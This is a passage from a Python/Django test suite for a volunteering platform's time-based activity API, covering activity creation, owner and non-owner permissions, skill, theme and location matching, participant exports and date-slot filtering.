self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
activity_id = response.json()['data']['id']
self.slot_data['data']['relationships']['activity']['data']['id'] = activity_id
response = self.client.post(self.slot_url, json.dumps(self.slot_data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.slot_data['data']['attributes']['title'] = 'Second meeting'
self.slot_data['data']['attributes']['start'] = '2020-12-05T10:00:00+01:00'
response = self.client.post(self.slot_url, json.dumps(self.slot_data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
activity_url = reverse('date-detail', args=(activity_id,))
response = self.client.get(activity_url, user=self.user)
self.response_data = response.json()['data']
# Now we can submit the activity
self.assertEqual(
{
transition['name'] for transition in
self.response_data['meta']['transitions']
},
{'submit', 'delete'}
)
def test_add_slots_by_other(self):
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
activity_id = response.json()['data']['id']
self.slot_data['data']['relationships']['activity']['data']['id'] = activity_id
other = BlueBottleUserFactory.create()
response = self.client.post(self.slot_url, json.dumps(self.slot_data), user=other)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class PeriodListAPIViewTestCase(TimeBasedListAPIViewTestCase, BluebottleTestCase):
type = 'period'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
def setUp(self):
super().setUp()
self.data['data']['attributes'].update({
'deadline': str(date.today() + timedelta(days=21)),
'duration': '4:00:00',
'duration_period': 'overall',
})
def test_create_complete(self):
super().test_create_complete()
self.assertEqual(
{
transition['name'] for transition in
self.response_data['meta']['transitions']
},
{'submit', 'delete'}
)
def test_create_no_location(self):
self.data['data']['attributes']['is-online'] = False
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(
'/data/attributes/location' not in (
error['source']['pointer'] for error in response.json()['data']['meta']['errors']
)
)
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(
'/data/attributes/location' in (
error['source']['pointer'] for error in response.json()['data']['meta']['required']
)
)
class TimeBasedDetailAPIViewTestCase():
def setUp(self):
super().setUp()
self.settings = InitiativePlatformSettingsFactory.create(
activity_types=[self.factory._meta.model.__name__.lower()]
)
self.client = JSONAPITestClient()
self.user = BlueBottleUserFactory()
self.activity = self.factory.create()
self.activity.refresh_from_db()
self.url = reverse('{}-detail'.format(self.type), args=(self.activity.pk,))
self.data = {
'data': {
'type': 'activities/time-based/{}s'.format(self.type),
'id': str(self.activity.pk),
'attributes': {
'title': 'Beach clean-up Katwijk',
'review': False,
'is-online': True,
'registration-deadline': str(date.today() + timedelta(days=14)),
'capacity': 10,
'description': 'We will clean up the beach south of Katwijk'
},
'relationships': {
'initiative': {
'data': {
'type': 'initiatives', 'id': self.activity.initiative.id
},
},
}
}
}
def test_get_owner(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['attributes']['title'], self.activity.title)
self.assertEqual(
data['meta']['permissions']['GET'],
True
)
self.assertEqual(
data['meta']['permissions']['PUT'],
True
)
self.assertEqual(
data['meta']['permissions']['PATCH'],
True
)
self.assertTrue(
{'name': 'cancel', 'target': 'cancelled', 'available': True}
in data['meta']['transitions']
)
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], None)
def test_matching_theme(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
user = BlueBottleUserFactory.create()
user.favourite_themes.add(self.activity.initiative.theme)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], True)
self.assertEqual(data['meta']['matching-properties']['location'], None)
def test_mismatching_theme(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
user = BlueBottleUserFactory.create()
user.favourite_themes.add(ThemeFactory.create())
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], False)
self.assertEqual(data['meta']['matching-properties']['location'], None)
def test_matching_skill(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
user = BlueBottleUserFactory.create()
user.skills.add(self.activity.expertise)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], True)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], None)
def test_mismatching_skill(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
user = BlueBottleUserFactory.create()
user.skills.add(SkillFactory.create())
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], False)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], None)
def test_get_owner_export_disabled(self):
initiative_settings = InitiativePlatformSettings.load()
initiative_settings.enable_participant_exports = False
initiative_settings.save()
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
export_url = data['attributes']['participants-export-url']
self.assertIsNone(export_url)
def test_get_owner_export_enabled(self):
initiative_settings = InitiativePlatformSettings.load()
initiative_settings.enable_participant_exports = True
initiative_settings.save()
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
export_url = data['attributes']['participants-export-url']['url']
export_response = self.client.get(export_url)
sheet = load_workbook(filename=BytesIO(export_response.content)).get_active_sheet()
self.assertEqual(sheet['A1'].value, 'Email')
self.assertEqual(sheet['B1'].value, 'Name')
self.assertEqual(sheet['C1'].value, 'Motivation')
wrong_signature_response = self.client.get(export_url + '111')
self.assertEqual(
wrong_signature_response.status_code, 404
)
def test_export_with_segments(self):
initiative_settings = InitiativePlatformSettings.load()
initiative_settings.enable_participant_exports = True
initiative_settings.save()
department = SegmentTypeFactory.create(name='Department')
music = SegmentTypeFactory.create(name='Music')
workshop = SegmentFactory.create(
type=department,
name='Workshop'
)
metal = SegmentFactory.create(
type=music,
name='Metal'
)
classical = SegmentFactory.create(
type=music,
name='Classical'
)
user = BlueBottleUserFactory.create()
user.segments.add(workshop)
user.segments.add(metal)
user.segments.add(classical)
self.participant_factory.create(
activity=self.activity,
user=user,
status='accepted'
)
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
export_url = data['attributes']['participants-export-url']['url']
export_response = self.client.get(export_url)
sheet = load_workbook(filename=BytesIO(export_response.content)).get_active_sheet()
self.assertEqual(sheet['A1'].value, 'Email')
self.assertEqual(sheet['B1'].value, 'Name')
self.assertEqual(sheet['C1'].value, 'Motivation')
self.assertEqual(sheet['F1'].value, 'Department')
self.assertEqual(sheet['G1'].value, 'Music')
self.assertEqual(sheet['F2'].value, 'Workshop')
self.assertEqual(sheet['G2'].value, 'Classical, Metal')
def test_get_other_user_export(self):
response = self.client.get(self.url, user=self.user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
export_url = data['attributes']['participants-export-url']
self.assertIsNone(export_url)
def test_get_open(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.data = response.json()['data']
self.assertTrue(
{'name': 'cancel', 'target': 'cancelled', 'available': True}
in self.data['meta']['transitions']
)
def test_get_contributors(self):
self.participant_factory.create_batch(4, activity=self.activity)
withdrawn = self.participant_factory.create(activity=self.activity)
withdrawn.states.withdraw(save=True)
response = self.client.get(self.url, user=self.activity.owner)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
self.response_data['meta']['contributor-count'],
4
)
response = self.client.get(
self.response_data['relationships']['contributors']['links']['related'],
user=self.activity.owner
)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
len(self.response_data),
5
)
def test_get_contributors_anonymous(self):
self.participant_factory.create_batch(4, activity=self.activity)
withdrawn = self.participant_factory.create(activity=self.activity)
withdrawn.states.withdraw(save=True)
response = self.client.get(self.url)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
self.response_data['meta']['contributor-count'],
4
)
response = self.client.get(
self.response_data['relationships']['contributors']['links']['related'],
)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
len(self.response_data),
4
)
def test_get_contributors_participant(self):
self.participant_factory.create_batch(4, activity=self.activity)
withdrawn = self.participant_factory.create(activity=self.activity)
withdrawn.states.withdraw(save=True)
participant = self.participant_factory.create(activity=self.activity)
participant.states.withdraw(save=True)
response = self.client.get(self.url, user=participant.user)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
self.response_data['meta']['contributor-count'],
4
)
response = self.client.get(
self.response_data['relationships']['contributors']['links']['related'],
user=participant.user
)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
len(self.response_data),
5
)
def test_get_non_anonymous(self):
response = self.client.get(self.url)
data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(data['attributes']['title'], self.activity.title)
self.assertEqual(
data['meta']['permissions']['GET'],
True
)
self.assertEqual(
data['meta']['permissions']['PUT'],
False
)
self.assertEqual(
data['meta']['permissions']['PATCH'],
False
)
def test_update_owner(self):
response = self.client.put(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.json()['data']['attributes']['title'],
self.data['data']['attributes']['title']
)
def test_update_manager(self):
response = self.client.put(
self.url, json.dumps(self.data), user=self.activity.initiative.activity_managers.first()
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.json()['data']['attributes']['title'],
self.data['data']['attributes']['title']
)
def test_update_initiative_owner(self):
response = self.client.put(
self.url, json.dumps(self.data), user=self.activity.initiative.owner
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.json()['data']['attributes']['title'],
self.data['data']['attributes']['title']
)
def test_update_unauthenticated(self):
response = self.client.put(self.url, json.dumps(self.data))
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_update_wrong_user(self):
response = self.client.put(
self.url, json.dumps(self.data), user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete_owner(self):
response = self.client.delete(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_delete_unauthenticated(self):
response = self.client.delete(self.url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_delete_wrong_user(self):
response = self.client.delete(
self.url, user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete_submitted(self):
self.activity.initiative.states.submit(save=True)
response = self.client.delete(
self.url, user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update_deleted(self):
self.activity.states.delete(save=True)
response = self.client.put(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update_rejected(self):
self.activity.states.reject(save=True)
response = self.client.put(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class DateDetailAPIViewTestCase(TimeBasedDetailAPIViewTestCase, BluebottleTestCase):
type = 'date'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
def setUp(self):
super().setUp()
self.data['data']['attributes'].update({
'start': str(now() + timedelta(days=21)),
'duration': '4:00',
})
self.slot = self.activity.slots.first()
self.slot_url = reverse('date-slot-detail', args=(self.slot.pk,))
def test_get_included_slot_location(self):
self.activity.save()
response = self.client.get(self.url)
included_resources = response.json()['included']
slots = [
resource for resource
in included_resources
if resource['type'] == 'activities/time-based/date-slots'
]
location_ids = [
resource['id'] for resource
in included_resources
if resource['type'] == 'geolocations'
]
for slot in slots:
self.assertTrue(slot['relationships']['location']['data']['id'] in location_ids)
def test_get_calendar_links(self):
response = self.client.get(self.url, user=self.activity.owner)
links = response.json()['data']['attributes']['links']
self.assertTrue(
links['ical'].startswith(
reverse('date-ical', args=(self.activity.pk, self.activity.owner.id))
)
)
def test_get_my_contributor(self):
participant = DateParticipantFactory.create(activity=self.activity)
response = self.client.get(self.url, user=participant.user)
included_participant = get_first_included_by_type(response, 'contributors/time-based/date-participants')
self.assertEqual(str(participant.pk), included_participant['id'])
def test_matching_all(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(
x=4.8981734, y=52.3790565
)
slot.location.save()
user = BlueBottleUserFactory.create()
user.place = PlaceFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
user.skills.add(self.activity.expertise)
user.favourite_themes.add(self.activity.initiative.theme)
user.save()
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], True)
self.assertEqual(data['meta']['matching-properties']['theme'], True)
self.assertEqual(data['meta']['matching-properties']['location'], True)
def test_matching_all_cancelled(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
self.activity.refresh_from_db()
self.activity.states.cancel(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(
x=4.8981734, y=52.3790565
)
slot.location.save()
user = BlueBottleUserFactory.create()
PlaceFactory.create(
content_object=user,
position=Point(x=4.9848386, y=52.3929661)
)
user.skills.add(self.activity.expertise)
user.favourite_themes.add(self.activity.initiative.theme)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], False)
self.assertEqual(data['meta']['matching-properties']['theme'], False)
self.assertEqual(data['meta']['matching-properties']['location'], False)
def test_matching_location_place(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(
x=4.8981734, y=52.3790565
)
slot.location.save()
user = BlueBottleUserFactory.create()
user.place = PlaceFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
user.save()
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], True)
def test_matching_location_location(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(
x=4.8981734, y=52.3790565
)
slot.location.save()
user = BlueBottleUserFactory.create(
location=LocationFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], True)
def test_matching_location_place_too_far(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(x=4.4207882, y=51.9280712)
slot.location.save()
user = BlueBottleUserFactory.create()
user.place = PlaceFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
user.save()
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], False)
def test_matching_location_location_too_far(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
slot = self.activity.slots.first()
slot.location.position = Point(x=4.4207882, y=51.9280712)
slot.location.save()
user = BlueBottleUserFactory.create(
location=LocationFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], False)
class PeriodDetailAPIViewTestCase(TimeBasedDetailAPIViewTestCase, BluebottleTestCase):
type = 'period'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
def setUp(self):
super().setUp()
self.data['data']['attributes'].update({
'deadline': str(date.today() + timedelta(days=21)),
})
def test_get_open(self):
super().test_get_open()
self.assertFalse(
{'name': 'succeed_manually', 'target': 'succeeded', 'available': True}
in self.data['meta']['transitions']
)
def test_get_open_with_participant(self):
self.activity.duration_period = 'weeks'
self.activity.save()
PeriodParticipantFactory.create(activity=self.activity)
super().test_get_open()
self.assertTrue(
{'name': 'succeed_manually', 'target': 'succeeded', 'available': True}
in self.data['meta']['transitions']
)
def test_matching_location_place(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
self.activity.location.position = Point(x=4.8981734, y=52.3790565)
self.activity.location.save()
user = BlueBottleUserFactory.create()
user.place = PlaceFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
user.save()
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], True)
def test_matching_location_location(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
self.activity.location.position = Point(x=4.8981734, y=52.3790565)
self.activity.location.save()
user = BlueBottleUserFactory.create(
location=LocationFactory.create(
position=Point(x=4.8948386, y=52.3929661)
)
)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], True)
def test_matching_location_place_too_far(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
self.activity.location.position = Point(x=4.4207882, y=51.9280712)
self.activity.location.save()
user = BlueBottleUserFactory.create()
user.place = PlaceFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
user.save()
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], False)
def test_matching_location_location_too_far(self):
self.activity.initiative.states.submit(save=True)
self.activity.initiative.states.approve(save=True)
self.activity.location.position = Point(x=4.4207882, y=51.9280712)
self.activity.location.save()
user = BlueBottleUserFactory.create(
location=LocationFactory.create(
position=Point(x=4.9848386, y=52.3929661)
)
)
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()['data']
self.assertEqual(data['meta']['matching-properties']['skill'], None)
self.assertEqual(data['meta']['matching-properties']['theme'], None)
self.assertEqual(data['meta']['matching-properties']['location'], False)
class TimeBasedTransitionAPIViewTestCase():
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.user = BlueBottleUserFactory()
self.activity = self.factory.create()
self.url = reverse('{}-transition-list'.format(self.type))
self.data = {
'data': {
'type': 'activities/time-based/{}-transitions'.format(self.type),
'attributes': {},
'relationships': {
'resource': {
'data': {
'type': 'activities/time-based/{}s'.format(self.type),
'id': self.activity.pk
}
}
}
}
}
def test_delete_by_owner(self):
# Owner can delete the activity
self.data['data']['attributes']['transition'] = 'delete'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = json.loads(response.content)
self.assertEqual(
data['included'][0]['type'],
'activities/time-based/{}s'.format(self.type)
)
self.assertEqual(data['included'][0]['attributes']['status'], 'deleted')
def test_delete_by_other_user(self):
self.data['data']['attributes']['transition'] = 'delete'
response = self.client.post(
self.url,
json.dumps(self.data),
user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
data = json.loads(response.content)
self.assertEqual(data['errors'][0], "Transition is not available")
def test_reject(self):
self.data['data']['attributes']['transition'] = 'reject'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
data = json.loads(response.content)
self.assertEqual(data['errors'][0], "Transition is not available")
def test_approve(self):
self.data['data']['attributes']['transition'] = 'approve'
response = self.client.post(
self.url,
json.dumps(self.data),
user=self.activity.owner
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
data = json.loads(response.content)
self.assertEqual(data['errors'][0], "Transition is not available")
class DateTransitionAPIViewTestCase(TimeBasedTransitionAPIViewTestCase, BluebottleTestCase):
type = 'date'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
class PeriodTransitionAPIViewTestCase(TimeBasedTransitionAPIViewTestCase, BluebottleTestCase):
type = 'period'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
class DateActivitySlotListAPITestCase(BluebottleTestCase):
def setUp(self):
self.client = JSONAPITestClient()
self.url = reverse('date-slot-list')
self.activity = DateActivityFactory.create(slots=[], slot_selection='free')
self.data = {
'data': {
'type': 'activities/time-based/date-slots',
'attributes': {
'title': 'Kick-off',
'is-online': True,
'start': '2020-12-01T10:00:00+01:00',
'duration': '2:30:00',
'capacity': 10,
},
'relationships': {
'activity': {
'data': {
'type': 'activities/time-based/dates',
'id': str(self.activity.pk)
},
},
}
}
}
def test_get(self):
DateActivitySlotFactory.create_batch(3, activity=self.activity)
DateActivitySlotFactory.create_batch(3, activity=DateActivityFactory.create())
response = self.client.get(self.url, {'activity': self.activity.id})
self.assertEqual(response.json()['meta']['pagination']['count'], len(self.activity.slots.all()))
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
slot_ids = [str(slot.pk) for slot in self.activity.slots.all()]
for slot in response.json()['data']:
self.assertTrue(slot['id'] in slot_ids)
def test_get_filtered_start(self):
DateActivitySlotFactory.create(
start=now() + timedelta(days=2),
activity=self.activity
)
DateActivitySlotFactory.create(
start=now() + timedelta(days=4),
activity=self.activity
)
latest = DateActivitySlotFactory.create(
start=now() + timedelta(days=6),
activity=self.activity
)
response = self.client.get(
self.url,
{
'activity': self.activity.id,
'start': (now() + timedelta(days=5)).strftime('%Y-%m-%d')
}
)
self.assertEqual(response.json()['meta']['pagination']['count'], 1)
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
self.assertEqual(response.json()['data'][0]['id'], str(latest.pk))
def test_get_invalid_start(self):
DateActivitySlotFactory.create_batch(3, activity=self.activity)
DateActivitySlotFactory.create_batch(3, activity=DateActivityFactory.create())
response = self.client.get(
self.url, {'activity': self.activity.id, 'start': 'invalid'}
)
self.assertEqual(response.json()['meta']['pagination']['count'], len(self.activity.slots.all()))
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
slot_ids = [str(slot.pk) for slot in self.activity.slots.all()]
for slot in response.json()['data']:
self.assertTrue(slot['id'] in slot_ids)
def test_get_filtered_end(self):
first = DateActivitySlotFactory.create(
start=now() + timedelta(days=2),
activity=self.activity
)
DateActivitySlotFactory.create(
start=now() + timedelta(days=4),
activity=self.activity
)
DateActivitySlotFactory.create(
start=now() + timedelta(days=6),
activity=self.activity
)
response = self.client.get(
self.url,
{
'activity': self.activity.id,
'end': (now() + timedelta(days=3)).strftime('%Y-%m-%d')
}
)
self.assertEqual(response.json()['meta']['pagination']['count'], 1)
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
self.assertEqual(response.json()['data'][0]['id'], str(first.pk))
def test_get_invalid_end(self):
DateActivitySlotFactory.create_batch(3, activity=self.activity)
DateActivitySlotFactory.create_batch(3, activity=DateActivityFactory.create())
response = self.client.get(
self.url, {'activity': self.activity.id, 'end': 'invalid'}
)
self.assertEqual(response.json()['meta']['pagination']['count'], len(self.activity.slots.all()))
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
slot_ids = [str(slot.pk) for slot in self.activity.slots.all()]
for slot in response.json()['data']:
self.assertTrue(slot['id'] in slot_ids)
def test_get_filtered_both(self):
DateActivitySlotFactory.create(
start=now() + timedelta(days=2),
activity=self.activity
)
middle = DateActivitySlotFactory.create(
start=now() + timedelta(days=4),
activity=self.activity
)
DateActivitySlotFactory.create(
start=now() + timedelta(days=6),
activity=self.activity
)
response = self.client.get(
self.url,
{
'activity': self.activity.id,
'start': (now() + timedelta(days=3)).strftime('%Y-%m-%d'),
'end': (now() + timedelta(days=5)).strftime('%Y-%m-%d')
}
)
self.assertEqual(response.json()['meta']['pagination']['count'], 1)
self.assertEqual(response.json()['meta']['total'], len(self.activity.slots.all()))
self.assertEqual(response.json()['data'][0]['id'], str(middle.pk))
def test_get_filtered_contributor_id(self):
participant = DateParticipantFactory.create(activity=self.activity)
slot = DateActivitySlotFactory.create(
start=now() + timedelta(days=2),
activity=self.activity
)
slot_participant = SlotParticipantFactory(slot=slot, participant=participant)
slot_participant.states.withdraw(save=True)
second = DateActivitySlotFactory.create(
start=now() + timedelta(days=4),
activity=self.activity
)
slot_participant = SlotParticipantFactory(slot=second, participant=participant)
third = DateActivitySlotFactory.create(
start=now() + timedelta(days=6),
activity=self.activity
)
other_participant = DateParticipantFactory.create(activity=self.activity)
slot_participant = SlotParticipantFactory(slot=third, participant=other_participant)
response = self.client.get(
self.url,
{
'activity': self.activity.id,
'contributor': participant.id
}
)
self.assertEqual(response.json()['meta']['pagination']['count'], 1)
self.assertEqual(response.json()['meta']['total'], 1)
self.assertEqual(response.json()['data'][0]['id'], str(second.pk))
def test_get_many(self):
DateActivitySlotFactory.create_batch(12, activity=self.activity)
DateActivitySlotFactory.create_batch(3, activity=DateActivityFactory.create())
response = self.client.get(self.url, {'activity': self.activity.id})
self.assertEqual(response.json()['meta']['pagination']['count'], len(self.activity.slots.all()))
self.assertEqual(len(response.json()['data']), 8)
slot_ids = [str(slot.pk) for slot in self.activity.slots.all()]
for slot in response.json()['data']:
self.assertTrue(slot['id'] in slot_ids)
response = self.client.get(self.url, {'activity': self.activity.id, 'page[number]': 2})
self.assertEqual(response.json()['meta']['pagination']['count'], len(self.activity.slots.all()))
self.assertEqual(len(response.json()['data']), 4)
slot_ids = [str(slot.pk) for slot in self.activity.slots.all()]
for slot in response.json()['data']:
self.assertTrue(slot['id'] in slot_ids)
def test_get_no_activity_id(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_get_invalid_activity_id(self):
response = self.client.get(self.url, {'activity': 'some-thing-wrong'})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_get_incorrect_activity_id(self):
response = self.client.get(self.url, {'activity': 1034320})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['meta']['pagination']['count'], 0)
self.assertEqual(len(response.json()['data']), 0)
def test_get_closed_site(self):
MemberPlatformSettings.objects.update(closed=True)
group = Group.objects.get(name='Anonymous')
group.permissions.remove(Permission.objects.get(codename='api_read_dateactivity'))
response = self.client.get(self.url, {'activity': self.activity.pk})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_create_owner(self):
response = self.client.post(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
data = response.json()
included = [{'id': resource['id'], 'type': resource['type']} for resource in data['included']]
for attr in ['start', 'duration', 'capacity']:
self.assertTrue(attr in data['data']['attributes'])
self.assertEqual(data['data']['meta']['status'], 'open')
self.assertTrue(
{'id': str(self.activity.pk), 'type': 'activities/time-based/dates'} in included
)
def test_create_other(self):
response = self.client.post(
self.url, json.dumps(self.data), user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_create_anonymous(self):
response = self.client.post(self.url, json.dumps(self.data))
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_create_open_activity(self):
DateActivitySlotFactory.create(activity=self.activity)
self.activity.initiative.states.submit()
self.activity.initiative.states.approve(save=True)
self.activity.states.submit(save=True)
response = self.client.post(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class DateActivitySlotDetailAPITestCase(BluebottleTestCase):
def setUp(self):
self.client = JSONAPITestClient()
self.activity = DateActivityFactory.create()
self.slot = DateActivitySlotFactory.create(activity=self.activity)
self.url = reverse('date-slot-detail', args=(self.slot.pk,))
self.data = {
'data': {
'type': 'activities/time-based/date-slots',
'id': str(self.slot.pk),
'attributes': {
'title': 'New title',
